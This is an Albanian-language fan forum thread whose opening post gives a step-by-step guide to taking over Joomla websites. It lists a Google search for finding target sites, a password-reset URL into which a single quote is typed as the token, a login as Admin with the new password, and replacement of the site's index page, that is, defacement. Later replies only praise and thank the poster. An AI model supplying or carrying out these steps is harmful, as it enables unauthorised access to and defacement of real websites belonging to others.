ForumForum  PortaliPortali  Lajme rreth Nini-t  RegjistrohuRegjistrohu  GalleryGallery  PytėsoriPytėsori  KėrkoKėrko  Lista AnėtarėveLista Anėtarėve  Grupet e AnėtarėveGrupet e Anėtarėve  identifikimiidentifikimi  
Lusim antaret qe te jene sa me aktiv ne forum, dhe te postojn sa me shume, sepse kohve te fundit jemi duke u bere te kontrolluar nga menagjeri i Florencia Bertottit, Florit. Ju lusim qe te keni parasysh kete dhe te jeni sa me aktiv ne postimin e mesazheve, natyrisht pa i thyer rregullat. Nese ka ndonje antar qe nuk eshte i kenaqur me forumin, le te lajmerohet ne forum, dhe le te shpreh pakenaqesite e tij. Ata qe jane sa me aktiv, do selektohen me shume ne letren qe do dergohet tek Florencia Bertotti.

Share | 
 

 Hacko Joomla site

Shko poshtė 
AutoriMesazh
Blero
Flori Fan
Flori Fan
avatar

Male Numri i postimeve : 435
Age : 23
Vendndodhja : Pejė/Kosovė
Disponimi i pergjithshem : Se Di Mvaret.!
Registration date : 02/12/2008

MesazhTitulli: Hacko Joomla site   Fri Dec 05, 2008 3:36 pm

Se pari hyjme :

Google.com

pastaj ne box e shenojm

inurl:index.php?option=com_user site:.com

Qe sherben per me gjet sajte Joomla, ndersa aty .com mundeni me bo ndryshu domainin qfare deshironi ta hackni
P.SH .ru .dk .de etj etj

Ja P.SH keshtu duhet te jete (ndryshe sben) :

http://www.bllablla.ru/index.php?option=com_user&view=remind

Tash vazhdojme keshtu
Ja hekim kete pjesen e fundit :

index.php?option=com_user&view=remind

Dhe e zevendesojme me kete :

index.php?option=com_user&view=reset&layout=confir m

Me pas do duhet te duket keshtu :

http://www.bllablla.ru//index.php?option=com_user&view=reset&layout=confir m

Pastaj do ju del ni box ku shkruan TOKEN dhe ne te duhet te shenoni vetem kete shenje qe gjendet me posht me te kalter :

'

Pastaj do ju dal te shenoni Passwordin e ri dhe ta komfirmoni ate !!
Dhe me pas ne Web ja bojme Login :

Login : Admin
Pass : Si e keni lon ju

Me pas shkoni :

www.blabla.ru/administrator

Logirateni me te dhenat qe keni dhene
Dhe Hyni ne AdminCP
Tek Templates
E zevendeson Indexin me Indexin tend

KUJDES :

* Nuk punon ne te gjitha mirepo ne shumicen e webeve punon
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://www.KosovaVB.Com
The.DessiGneeR.
Dizajner
Dizajner
avatar

Male Numri i postimeve : 65
Age : 26
Vendndodhja : N'kthes t'Rufcit te Vrella
Disponimi i pergjithshem : i qetė
Registration date : 04/12/2008

MesazhTitulli: Re: Hacko Joomla site   Wed Dec 10, 2008 9:39 pm

Bravooooo! Hacker!
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://www.familja-serrano.forumotion.com
lussi
Vdes per Florin
Vdes per Florin
avatar

Female Numri i postimeve : 1200
Age : 24
Vendndodhja : in my place
Kenget e preferuara te Floricientes? : los ninos no mueren
Disponimi i pergjithshem : not always happy
Registration date : 14/01/2009

MesazhTitulli: Re: Hacko Joomla site   Fri Jan 16, 2009 2:45 pm

kuku po te pshtjellta nejse do i kom kuptu veq i lumu ti qe pi din
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://www.vip-actore.piczo.com
Blero
Flori Fan
Flori Fan
avatar

Male Numri i postimeve : 435
Age : 23
Vendndodhja : Pejė/Kosovė
Disponimi i pergjithshem : Se Di Mvaret.!
Registration date : 02/12/2008

MesazhTitulli: Re: Hacko Joomla site   Thu Apr 30, 2009 4:11 pm

haha paj kur ja nis me u mar me hack i mson tonat :)
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://www.KosovaVB.Com
Edona
Vdes per Florin
Vdes per Florin
avatar

Female Numri i postimeve : 6018
Age : 21
Vendndodhja : De mas linda del mundo FLOR BERTOTTI
Kenget e preferuara te Floricientes? : "Flores amarillas"."Te siento" ."En enombre dragon"Ding-dong"."Delfina"."Por que"."Kikiriki"."Des que te vi".Haj un cuento"...
Disponimi i pergjithshem : e hareshme
Registration date : 13/12/2008

MesazhTitulli: Re: Hacko Joomla site   Thu May 07, 2009 7:19 pm

A krejt i din per kompiuter a???

NEJSE.THANK YOU!!!
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
Blero
Flori Fan
Flori Fan
avatar

Male Numri i postimeve : 435
Age : 23
Vendndodhja : Pejė/Kosovė
Disponimi i pergjithshem : Se Di Mvaret.!
Registration date : 02/12/2008

MesazhTitulli: Re: Hacko Joomla site   Fri May 08, 2009 5:19 pm

jo bash tonat jo ..mos e perzij hackimin me pc :)...paj deri dikund op :)
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://www.KosovaVB.Com
Libona
Vdes per Florin
Vdes per Florin
avatar

Female Numri i postimeve : 7095
Age : 24
Vendndodhja : En qualquier pais donde lo encuentro mi prinicipe y mis favoritos..En lugar da haditas!
Kenget e preferuara te Floricientes? : Un enorme dragon,Te siento,Hay un cuento,Porque,Mi vestido azul,Chaval Chulito,1.2.3,y todas...
Disponimi i pergjithshem : alegra y triste
Registration date : 13/09/2008

MesazhTitulli: Re: Hacko Joomla site   Sun Jun 07, 2009 5:29 pm

flm shum shum

_________________


F&F xsiempe..miss you!
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://s'kom.com
Sponsored content
MesazhTitulli: Re: Hacko Joomla site   

Mbrapsht nė krye Shko poshtė
 
Hacko Joomla site
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
Florencia Bertotti Kosovo - FBK :: Te tjera :: Te tjera-
Kėrce tek: